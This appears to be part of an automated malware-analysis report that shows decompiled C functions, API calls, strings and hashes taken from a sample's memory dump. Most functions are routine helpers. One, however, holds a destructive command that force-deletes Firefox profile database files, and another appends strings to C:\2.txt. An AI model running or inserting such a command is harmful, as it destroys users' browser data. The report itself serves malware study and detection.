API String ID: 2205422386-3916222277
Opcode ID: afe2294f9c8a4195b572ad44cb149ff0589a256def40825b0defa7b8ebef314b
Instruction ID: bd2c3054641471dd2994f8d590c0498df4c9d02a46a0b429fcc85b5f66e3b40a
Opcode Fuzzy Hash: afe2294f9c8a4195b572ad44cb149ff0589a256def40825b0defa7b8ebef314b
Instruction Fuzzy Hash: EDF05E71E1432DAAFB20DBB4CC45F8E7BB8AB04749F104059E608B71C1D3F1AA048FA1

Uniqueness

Uniqueness Score: -1.00%

Function 1000901E, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E1000901E(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				_Unknown_base(*)()* _t8;
				struct HINSTANCE__* _t11;
				intOrPtr _t13;

				_t11 = LoadLibraryA("ntdll.dll");
				if(_t11 != 0) {
					_t8 = GetProcAddress(_t11, "RtlGetNtVersionNumbers");
					if(_t8 != 0) {
						_t13 = _a12;
						 *_t8(_a4, _a8, _t13);
						 *(_t13 + 2) =  *(_t13 + 2) & 0x00000000;
						_push(1);
						_pop(0);
					}
					FreeLibrary(_t11);
				}
				return 0;
			}

0x10009030
0x10009034
0x1000903c
0x10009044
0x10009046
0x10009050
0x10009052
0x10009057
0x10009059
0x10009059
0x1000905b
0x1000905b
0x10009066

APIs

LoadLibraryA.KERNEL32(ntdll.dll,00000010,?,?,1000AFE6,?,?,?), ref: 1000902A
GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 1000903C
FreeLibrary.KERNEL32(00000000,?,1000AFE6,?,?,?), ref: 1000905B

Strings

RtlGetNtVersionNumbers, xrefs: 10009036
ntdll.dll, xrefs: 10009023

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Library$AddressFreeLoadProc
String ID: RtlGetNtVersionNumbers$ntdll.dll
API String ID: 145871493-1263206204
Opcode ID: a005556004661087fd24eea2b6312802601bb4672dd50634f00142ca870ebabc
Instruction ID: a6ccb04ed19b5ac0c6f2e6356ba0acb90ecd2f9d0d27334e469b768c5cf2fce1
Opcode Fuzzy Hash: a005556004661087fd24eea2b6312802601bb4672dd50634f00142ca870ebabc
Instruction Fuzzy Hash: A7E09232200A247BEB225B959C89DDB7FB8EB85BE1B428025FE1892110DF35D851C690

Uniqueness

Uniqueness Score: -1.00%

Function 10008FDE, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E10008FDE(void* __ecx) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				signed int _t12;
				_Unknown_base(*)()* _t15;

				_t8 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "IsWow64Process");
				_v8 = _v8 & 0x00000000;
				_t15 = _t8;
				if(_t15 != 0) {
					_t12 =  *_t15(GetCurrentProcess(),  &_v8);
					if(_t12 == 0) {
						_v8 = _v8 & _t12;
					}
				}
				return _v8;
			}

0x10008ff4
0x10008ffa
0x10008ffe
0x10009002
0x1000900f
0x10009013
0x10009015
0x10009015
0x10009013
0x1000901d

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,?,?,?,1000B00D), ref: 10008FED
GetProcAddress.KERNEL32(00000000), ref: 10008FF4
GetCurrentProcess.KERNEL32(00000000), ref: 10009008

Strings

IsWow64Process, xrefs: 10008FE3
kernel32.dll, xrefs: 10008FE8

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressCurrentHandleModuleProcProcess
String ID: IsWow64Process$kernel32.dll
API String ID: 4190356694-3024904723
Opcode ID: 3feeb0385a4643d5a563bf3f2e812ad2bd3454a97b8a1798e78e394b9439bce3
Instruction ID: 95db18abf433c354797b582af78db346cbe211eb9ed29f51e9aff95993ca86c5
Opcode Fuzzy Hash: 3feeb0385a4643d5a563bf3f2e812ad2bd3454a97b8a1798e78e394b9439bce3
Instruction Fuzzy Hash: FAE01A72C02229FBEB02D7E49D49ADE7ABCEB04295B918450F901E2004EB30DB049AA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000D16B, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24
fileCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E1000D16B(intOrPtr _a4) {
				signed int _t2;
				struct _IO_FILE* _t9;

				_t2 = fopen("C:\\2.txt", "a+");
				_t9 = _t2;
				if(_t9 != 0) {
					_push(_a4);
					fprintf(_t9, "%s\n");
					fclose(_t9);
					return 0;
				}
				return _t2 | 0xffffffff;
			}

0x1000d179
0x1000d17f
0x1000d185
0x1000d18c
0x1000d195
0x1000d19c
0x00000000
0x1000d1a5
0x00000000

APIs

fopen.MSVCRT ref: 1000D179
fprintf.MSVCRT ref: 1000D195
fclose.MSVCRT ref: 1000D19C

Strings

%s, xrefs: 1000D18F
C:\2.txt, xrefs: 1000D174

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: fclosefopenfprintf
String ID: %s$C:\2.txt
API String ID: 167258513-4237254449
Opcode ID: 833cca0b154d6a27a7cab4e093a281e49c4aa0f2f3cb3f6284573f3c11889dbb
Instruction ID: 1e396966e7bb9dc23a7cbb05329857104bbd9a5fed792338839774c76775b3b7
Opcode Fuzzy Hash: 833cca0b154d6a27a7cab4e093a281e49c4aa0f2f3cb3f6284573f3c11889dbb
Instruction Fuzzy Hash: 3AE0CD364018357BA610F7A4AC46CDE3F58EF021B23844312FA16D11D0DF31850442EB

Uniqueness

Uniqueness Score: -1.00%

Function 10005E53, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 17
sleepprocessCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10005E53() {
				intOrPtr* _v8;
				void* __ebp;
				intOrPtr* _t7;

				_v8 = _t7;
				L10015818();
				E1000490A();
				 *_t7 = 0x3e8;
				Sleep("firefox.exe");
				system("del /s /f %appdata%\\Mozilla\\Firefox\\Profiles\\*.db");
				return 0;
			}

0x10005e5a
0x10005e62
0x10005e67
0x10005e6c
0x10005e73
0x10005e7e
0x10005e88

APIs

#537.MFC42(firefox.exe), ref: 10005E62

Part of subcall function 1000490A: __EH_prolog.LIBCMT ref: 1000490F
Part of subcall function 1000490A: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10004925
Part of subcall function 1000490A: Process32First.KERNEL32(00000000,?), ref: 1000493E
Part of subcall function 1000490A: #800.MFC42(00000000,00000000,00000128,00000000,?,00000002,00000000,?,00000000,75D6F420), ref: 10004A1F

Sleep.KERNEL32(firefox.exe), ref: 10005E73
system.MSVCRT ref: 10005E7E

Strings

del /s /f %appdata%\Mozilla\Firefox\Profiles\*.db, xrefs: 10005E79
firefox.exe, xrefs: 10005E5D

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: #537#800CreateFirstH_prologProcess32SleepSnapshotToolhelp32system
String ID: del /s /f %appdata%\Mozilla\Firefox\Profiles\*.db$firefox.exe
API String ID: 2309254383-1042855504
Opcode ID: df1c517a2b38ed698ff92f66bf700b6611d21e80ec8dcc3a4f5e473ec6ab76e4
Instruction ID: 1185fb0f4411ad4d4b0bc246eea684025751ccbbb3a757be401eeed4579ce7d2
Opcode Fuzzy Hash: df1c517a2b38ed698ff92f66bf700b6611d21e80ec8dcc3a4f5e473ec6ab76e4
Instruction Fuzzy Hash: 17D0A7B5224214EFD704EFEBEC4784E7BACDB45340B418118F14986141CF70B4054ABB

Uniqueness

Uniqueness Score: -1.00%

Function 00418FB0, Relevance: 7.6, APIs: 5, Instructions: 108
windowthreadCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00418FB0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;

				_push(0x14);
				E004271DA(E0043A9BC, __ebx, __edi, __esi);
				_t55 =  *((intOrPtr*)(_t68 + 0xc)) + 0x2cc;
				if(_t55 > 0xf) {
					L21:
					_t56 = 0;
				} else {
					switch( *((intOrPtr*)(( *(_t55 + 0x419170) & 0x000000ff) * 4 +  &M00419148))) {
						case 0:
							__eax =  *(__ebp + 0x10);
							 *__eax = 2;
							 *(__eax + 8) = 1;
							goto L4;
						case 1:
							_t59 =  *((intOrPtr*)(_t68 + 0x10));
							 *(_t59 + 8) =  *(_t59 + 8) | 0x0000ffff;
							goto L3;
						case 2:
							__esi =  *(__ebp + 0x10);
							__ecx =  *(__ebp + 8);
							 *__esi = 0xb;
							__eax = E0041965D( *(__ebp + 8));
							__eax =  ~__eax;
							asm("sbb eax, eax");
							 *(__esi + 8) = __ax;
							goto L4;
						case 3:
							__eax =  *(__ebp + 0x10);
							 *(__eax + 8) =  *(__eax + 8) & 0x00000000;
							L3:
							 *_t59 = 0xb;
							goto L4;
						case 4:
							__eax = E004151D0();
							__ecx = __ebp + 0xc;
							__eax = E00401FA0(__ebp + 0xc, __eax);
							__ecx = __ebp + 0xc;
							 *(__ebp - 4) = 1;
							__eax = E00402160(__ebp + 0xc, 0xf1c0);
							goto L19;
						case 5:
							__esi =  *(__ebp + 0x10);
							 *__esi = 3;
							__eax = GetThreadLocale();
							 *(__esi + 8) = __eax;
							goto L4;
						case 6:
							__eflags =  *(__esi + 0x5c) - 0xffffffff;
							if(__eflags == 0) {
								_push( *(__esi + 0x20));
								__ecx = __ebp - 0x20;
								__eax = E00414208(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
								 *(__esi + 0x20) = SendMessageA( *( *(__esi + 0x20) + 0x20), 0x138,  *(__ebp - 0x1c),  *( *(__esi + 0x20) + 0x20));
								 *(__esi + 0x5c) = GetBkColor( *(__ebp - 0x18));
								__eax = GetTextColor( *(__ebp - 0x18));
								__ecx = __ebp - 0x20;
								 *(__esi + 0x60) = __eax;
								__eax = E0041425C(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
							}
							__eflags = __edi - 0xfffffd43;
							__eax =  *(__ebp + 0x10);
							 *__eax = 3;
							if(__edi != 0xfffffd43) {
								__esi =  *(__esi + 0x60);
							} else {
								__esi =  *(__esi + 0x5c);
							}
							 *(__eax + 8) = __esi;
							goto L4;
						case 7:
							__eflags =  *(__esi + 0x64);
							if(__eflags != 0) {
								L15:
								__edi =  *(__ebp + 0x10);
								 *__edi = 9;
								__eax =  *(__esi + 0x64);
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *((intOrPtr*)( *__eax + 4))();
								__eax =  *(__esi + 0x64);
								 *(__edi + 8) = __eax;
								goto L4;
							} else {
								__ecx =  *(__esi + 0x20);
								__eax = E004182F4( *(__esi + 0x20));
								__ecx = __esi;
								__eax = E00418E77(__ebx, __esi, __edi, __esi, __eflags, __eax);
								__eflags =  *(__esi + 0x64);
								if( *(__esi + 0x64) == 0) {
									goto L21;
								} else {
									goto L15;
								}
							}
							goto L22;
						case 8:
							__eax = E004151D0();
							__ecx = __ebp + 0xc;
							__eax = E00401FA0(__ebp + 0xc, __eax);
							_t44 = __ebp - 4;
							 *_t44 =  *(__ebp - 4) & 0x00000000;
							__eflags =  *_t44;
							L19:
							__esi =  *(__ebp + 0x10);
							__ecx = __ebp + 0xc;
							 *__esi = 8;
							__eax = E004113EB(__ebx, __ebp + 0xc, __edx, __edi, __esi);
							__ecx =  *(__ebp + 0xc);
							__ecx =  *(__ebp + 0xc) + 0xfffffff0;
							 *(__esi + 8) = __eax;
							__eax = E00401E60( *(__ebp + 0xc) + 0xfffffff0, __edx);
							L4:
							_t56 = 1;
							goto L22;
						case 9:
							goto L21;
					}
				}
				L22:
				return E004272B2(_t56);
			}

APIs

__EH_prolog3.LIBCMT ref: 00418FB7
SendMessageA.USER32(?,00000138,?,?), ref: 0041902F
GetBkColor.GDI32(?), ref: 00419038
GetTextColor.GDI32(?), ref: 00419044
GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 004190D6

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$H_prolog3LocaleMessageSendTextThread
String ID:
API String ID: 187318432-0
Opcode ID: 6f2c8bfaad31ccb83de2a076c2cb7fa4b8b9ef0c93403cbecc00751135611f5d
Instruction ID: 976757ffee2d5a3670a5faa552d76543763fb3bf02de6dc557011058f8e27ddd
Opcode Fuzzy Hash: 6f2c8bfaad31ccb83de2a076c2cb7fa4b8b9ef0c93403cbecc00751135611f5d
Instruction Fuzzy Hash: 3F417F7050070ADFCB109F65C8589DE77B0FF08314F11855EF896AB3A1DB78A992CB69

Uniqueness

Uniqueness Score: -1.00%

Function 1001439F, Relevance: 7.6, APIs: 5, Instructions: 107
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001439F(signed int __ecx, CHAR* _a4, long _a8, intOrPtr _a12) {
				CHAR* _t36;
				void* _t37;
				void* _t38;
				void* _t43;
				void* _t45;
				long _t46;
				signed int _t48;
				signed int _t49;
				long _t50;
				signed int _t51;

				_t48 = __ecx;
				_t51 = __ecx;
				if( *(__ecx + 4) != 0 ||  *((intOrPtr*)(__ecx + 0xc)) != 0 ||  *((intOrPtr*)(__ecx + 0x20)) != 0 ||  *((intOrPtr*)(__ecx + 0x18)) != 0 ||  *((intOrPtr*)(__ecx + 0x14)) != 0 ||  *((intOrPtr*)(__ecx + 0x2c)) != 0) {
					return 0x1000000;
				} else {
					if(_a12 != 1) {
						if(_a12 != 2) {
							if(_a12 != 3) {
								return 0x10000;
							}
							_t50 = _a8;
							if(_t50 != 0) {
								_t36 = _a4;
								if(_t36 == 0) {
									_t37 = CreateFileMappingA(0xffffffff, 0, 4, 0, _t50, 0);
									 *(_t51 + 0xc) = _t37;
									if(_t37 != 0) {
										_t38 = MapViewOfFile(_t37, 0xf001f, 0, 0, _t50);
										 *(_t51 + 0x20) = _t38;
										if(_t38 != 0) {
											L20:
											 *(_t51 + 0x1c) = 1;
											 *((intOrPtr*)(_t51 + 0x24)) = 0;
											 *(_t51 + 0x28) = _t50;
											L10:
											return 0;
										}
										CloseHandle( *(_t51 + 0xc));
										 *(_t51 + 0xc) = 0;
									}
									return 0x300;
								}
								 *((intOrPtr*)(__ecx + 0x20)) = _t36;
								goto L20;
							}
							return 0x30000;
						}
						_t43 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0x80, 0);
						 *(_t51 + 4) = _t43;
						if(_t43 != 0xffffffff) {
							 *(_t51 + 0x1c) = 1;
							 *(_t51 + 0x10) = 0;
							 *((char*)(_t51 + 8)) = 1;
							goto L10;
						}
						 *(_t51 + 4) = 0;
						return 0x200;
					}
					_t45 = _a4;
					 *(__ecx + 4) = _t45;
					 *((char*)(__ecx + 8)) = 0;
					_t46 = SetFilePointer(_t45, 0, 0, 1);
					_t49 = _t48 & 0xffffff00 | _t46 != 0xffffffff;
					 *(_t51 + 0x1c) = _t49;
					if(_t49 == 0) {
						 *(_t51 + 0x10) = 0;
					} else {
						 *(_t51 + 0x10) = _t46;
					}
					goto L10;
				}
			}

0x1001439f
0x100143a4
0x100143ac
0x00000000
0x100143df
0x100143e3
0x10014419
0x10014459
0x00000000
0x100144bf
0x1001445b
0x10014460
0x10014469
0x1001446e
0x10014487
0x1001448f
0x10014492
0x100144a4
0x100144ac
0x100144af
0x10014473
0x10014473
0x10014477
0x1001447a
0x1001440e
0x00000000
0x1001440e
0x100144b4
0x100144ba
0x100144ba
0x00000000
0x10014494
0x10014470
0x00000000
0x10014470
0x00000000
0x10014462
0x1001442d
0x10014436
0x10014439
0x10014448
0x1001444c
0x1001444f
0x00000000
0x1001444f
0x1001443b
0x00000000
0x1001443e
0x100143e5
0x100143ed
0x100143f0
0x100143f3
0x100143fc
0x10014401
0x10014404
0x1001440b
0x10014406
0x10014406
0x10014406
0x00000000
0x10014404

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 100143F3
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 1001442D
CreateFileMappingA.KERNEL32 ref: 10014487
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?), ref: 100144A4
CloseHandle.KERNEL32(?), ref: 100144B4

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: File$Create$CloseHandleMappingPointerView
String ID:
API String ID: 1737989552-0
Opcode ID: 1475cf3c098f80013579768d9be2b2b046cc47ee806a0e804e0ec6e2a4901b99
Instruction ID: 00248cb2fcd0b1c45bed006f7a3003b016a1e675121ce1eb8c594c0a6bda904f
Opcode Fuzzy Hash: 1475cf3c098f80013579768d9be2b2b046cc47ee806a0e804e0ec6e2a4901b99
Instruction Fuzzy Hash: 2D315070505B85AFD730CF2588C4B47BAE8FB04394F168A2EF59A8A5A0D770ECC59B51

Uniqueness

Uniqueness Score: -1.00%

Function 00401210, Relevance: 7.6, APIs: 5, Instructions: 102
windowCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00401210(void* __eflags) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t24;
				struct HMENU__** _t35;
				intOrPtr* _t39;
				void* _t45;
				void* _t48;
				void* _t60;
				struct HMENU__* _t62;
				void* _t66;
				CHAR* _t69;
				void* _t71;
				void* _t74;
				signed int _t76;
				void* _t78;
				struct HMENU__** _t80;

				_t78 = __eflags;
				_push(0xffffffff);
				_push(E0043B988);
				_push( *[fs:0x0]);
				_push(_t48);
				_push(_t45);
				_push(_t66);
				_t24 =  *0x44f5d0; // 0x8e7de579
				_push(_t24 ^ _t76);
				 *[fs:0x0] = _t76 + 0x18;
				_t71 = _t48;
				E0040C486(_t45, _t48, _t66);
				_push(GetSystemMenu( *(_t71 + 0x20), 0));
				_t74 = E0040E7CD(_t45, _t60, _t66, _t71, _t78);
				if(_t74 != 0) {
					_t35 = E004151D0();
					_t80 = _t35;
					_t54 = 0 | _t80 == 0x00000000;
					if(_t80 == 0) {
						_push(0x80004005);
						_t35 = E00401D00(_t45, _t54, _t66, _t71, _t74);
					}
					_t62 =  *_t35;
					_t6 =  *((intOrPtr*)( *((intOrPtr*)(_t62 + 0xc))))() + 0x10; // 0x10
					_t69 = _t6;
					 *(_t76 + 0x14) = _t69;
					_push(0x65);
					 *(_t76 + 0x24) = 0;
					if(E0040E8CF() != 0) {
						E00402190(_t45, _t76 + 0x1c, _t74, _t38, 0x65);
						_t69 =  *(_t76 + 0x14);
					}
					if( *((intOrPtr*)(_t69 - 0xc)) != 0) {
						AppendMenuA( *(_t74 + 4), 0x800, 0, 0);
						_t62 =  *(_t74 + 4);
						AppendMenuA(_t62, 0, 0x10, _t69);
					}
					_t14 = _t69 - 0x10; // 0x0
					_t39 = _t14;
					 *((intOrPtr*)(_t76 + 0x20)) = 0xffffffff;
					asm("lock xadd [ecx], edx");
					if((_t62 | 0xffffffff) - 1 <= 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t39)) + 4))))(_t39);
					}
				}
				SendMessageA( *(_t71 + 0x20), 0x80, 1,  *(_t71 + 0x74));
				SendMessageA( *(_t71 + 0x20), 0x80, 0,  *(_t71 + 0x74));
				 *[fs:0x0] =  *((intOrPtr*)(_t76 + 0x18));
				return 1;
			}

APIs

GetSystemMenu.USER32(?,00000000,8E7DE579,?,?,?,?,?,?,0043B988,000000FF), ref: 00401242
AppendMenuA.USER32 ref: 004012BE
AppendMenuA.USER32 ref: 004012C9
SendMessageA.USER32(?,00000080,00000001,?), ref: 00401304
SendMessageA.USER32(?,00000080,00000000,?), ref: 00401315

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$AppendMessageSend$System
String ID:
API String ID: 62300227-0
Opcode ID: e2e2f21b7d31a8a46bd0ff38669d3c0be8cba821ac252d01998c9ac9d2c2e9bd
Instruction ID: be0c2a081e90a1eefdcb775bca3028feebb7a72e45825bfc1279280e3ee9bfe8
Opcode Fuzzy Hash: e2e2f21b7d31a8a46bd0ff38669d3c0be8cba821ac252d01998c9ac9d2c2e9bd
Instruction Fuzzy Hash: B6317075240701AFE314DB65DC45F67B3E9FB88710F108A2EF655AB2E0DB79E8048B68

Uniqueness

Uniqueness Score: -1.00%

Function 10014512, Relevance: 7.6, APIs: 5, Instructions: 86
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10014512(void* __ecx, long _a4, int _a8) {
				void* _t30;
				intOrPtr _t34;
				intOrPtr _t38;
				void* _t44;
				intOrPtr _t46;
				intOrPtr _t48;
				void* _t55;
				int _t56;
				void* _t57;
				void* _t58;

				_t55 = _a4;
				_t57 = __ecx;
				_t56 = _a8;
				if( *((char*)(__ecx + 0x2d)) == 0) {
					L9:
					_t48 =  *((intOrPtr*)(_t57 + 0x20));
					if(_t48 == 0) {
						_t30 =  *(_t57 + 4);
						__eflags = _t30;
						if(_t30 == 0) {
							 *((intOrPtr*)(_t57 + 0x14)) = 0x1000000;
							L16:
							return 0;
						}
						WriteFile(_t30, _t55, _t56,  &_a4, 0);
						return _a4;
					}
					_t34 =  *((intOrPtr*)(_t57 + 0x24));
					if(_t34 + _t56 <  *((intOrPtr*)(_t57 + 0x28))) {
						memcpy(_t34 + _t48, _t55, _t56);
						 *((intOrPtr*)(_t57 + 0x24)) =  *((intOrPtr*)(_t57 + 0x24)) + _t56;
						return _t56;
					}
					 *((intOrPtr*)(_t57 + 0x14)) = 0x30000;
					goto L16;
				}
				_t38 =  *((intOrPtr*)(__ecx + 0x3c));
				_t46 = 0;
				if(_t38 != 0 &&  *((intOrPtr*)(__ecx + 0x40)) < _t56) {
					_push(_t38);
					L10015800();
					 *((intOrPtr*)(__ecx + 0x3c)) = 0;
				}
				if( *(_t57 + 0x3c) == _t46) {
					_t44 = _t56 + _t56;
					_push(_t44);
					L10015806();
					 *(_t57 + 0x3c) = _t44;
					 *(_t57 + 0x40) = _t56;
				}
				memcpy( *(_t57 + 0x3c), _a4, _t56);
				_t58 = _t58 + 0xc;
				_t64 = _t56;
				if(_t56 <= 0) {
					L8:
					_t55 =  *(_t57 + 0x3c);
					goto L9;
				} else {
					do {
						 *((char*)(_t46 +  *(_t57 + 0x3c))) = E1001409D(_t64, _t57 + 0x30,  *((intOrPtr*)(_t46 +  *(_t57 + 0x3c))));
						_t46 = _t46 + 1;
					} while (_t46 < _t56);
					goto L8;
				}
			}

0x10014515
0x1001451a
0x1001451d
0x10014524
0x10014586
0x10014586
0x1001458b
0x100145b5
0x100145b8
0x100145ba
0x100145d0
0x100145d7
0x00000000
0x100145d7
0x100145c5
0x00000000
0x100145cb
0x1001458d
0x10014596
0x100145a6
0x100145ae
0x00000000
0x100145b1
0x10014598
0x00000000
0x10014598
0x10014526
0x10014529
0x1001452d
0x10014534
0x10014535
0x1001453b
0x1001453b
0x10014541
0x10014543
0x10014546
0x10014547
0x1001454d
0x10014550
0x10014550
0x1001455a
0x1001455f
0x10014562
0x10014564
0x10014583
0x10014583
0x00000000
0x10014566
0x10014566
0x1001457b
0x1001457e
0x1001457f
0x00000000
0x10014566

APIs

#825.MFC42(?), ref: 10014535
#823.MFC42(?), ref: 10014547
memcpy.MSVCRT ref: 1001455A
memcpy.MSVCRT ref: 100145A6
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 100145C5

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: memcpy$#823#825FileWrite
String ID:
API String ID: 3892973715-0
Opcode ID: d54253dc4ba9ec095cbef21c37e11591f35ddc7485adbcc95baf7bfd7aa9060c
Instruction ID: cefc97cc2efe227a0c1eaa95c15472f844cc14d81a091c2b108d0479ae8c9ddd
Opcode Fuzzy Hash: d54253dc4ba9ec095cbef21c37e11591f35ddc7485adbcc95baf7bfd7aa9060c
Instruction Fuzzy Hash: 13218C75500B009FC761CFA5D984A57B7FAFF84644B61492EF8868BA12EE70F884CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00414AE1, Relevance: 7.6, APIs: 5, Instructions: 79
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00414AE1(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t42;
				long _t45;
				long _t52;
				void* _t64;
				void* _t68;
				void* _t72;
				void* _t74;
				void* _t78;

				_t72 = __edx;
				_t59 = __ebx;
				_push(8);
				E004271DA(E0043A492, __ebx, __edi, __esi);
				_t74 = __ecx;
				 *(_t78 - 0x14) = 0;
				if(( *( *((intOrPtr*)(__ecx + 0x74)) + 0x34) & 0x00080000) == 0 ||  *((intOrPtr*)(__ecx + 0x20)) == 0) {
					L9:
					E00401EE0(_t59, _t78,  *((intOrPtr*)( *((intOrPtr*)(_t74 + 0x74)) + 0x1c)));
				} else {
					E00401FA0(_t78 - 0x10, E004151D0());
					 *(_t78 - 4) = 0;
					_t42 = E00401D50(_t78 - 0x10, 0x104);
					_t59 = GetParent;
					 *(_t78 - 0x14) = _t42;
					_t45 = SendMessageA( *(E00410E42(GetParent, _t78, GetParent( *(_t74 + 0x20))) + 0x20), 0x464, 0x104,  *(_t78 - 0x14));
					_t64 = _t78 - 0x10;
					if(_t45 >= 0) {
						E0040D723(GetParent, _t64, _t74, _t78, 0xffffffff);
					} else {
						E00402100(_t64);
					}
					if( *((intOrPtr*)( *((intOrPtr*)(_t78 - 0x10)) - 0xc)) == 0) {
						L8:
						 *(_t78 - 4) =  *(_t78 - 4) | 0xffffffff;
						E00401E60( *((intOrPtr*)(_t78 - 0x10)) + 0xfffffff0, _t72);
						goto L9;
					} else {
						 *(_t78 - 0x14) = E00401D50(_t78 - 0x10, 0x104);
						_t52 = SendMessageA( *(E00410E42(_t59, _t78, GetParent( *(_t74 + 0x20))) + 0x20), 0x465, 0x104,  *(_t78 - 0x14));
						_t68 = _t78 - 0x10;
						if(_t52 >= 0) {
							E0040D723(_t59, _t68, _t74, _t78, 0xffffffff);
							E00405440( *((intOrPtr*)(_t78 + 8)), __eflags, _t78 - 0x10);
							E00401E60( *((intOrPtr*)(_t78 - 0x10)) + 0xfffffff0, _t72);
						} else {
							E00402100(_t68);
							goto L8;
						}
					}
				}
				return E004272B2( *((intOrPtr*)(_t78 + 8)));
			}

APIs

__EH_prolog3.LIBCMT ref: 00414AE8
GetParent.USER32(?), ref: 00414B38
SendMessageA.USER32(?,00000464,00000104,?), ref: 00414B4C
GetParent.USER32(?), ref: 00414B7F
SendMessageA.USER32(?,00000465,00000104,?), ref: 00414B93

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
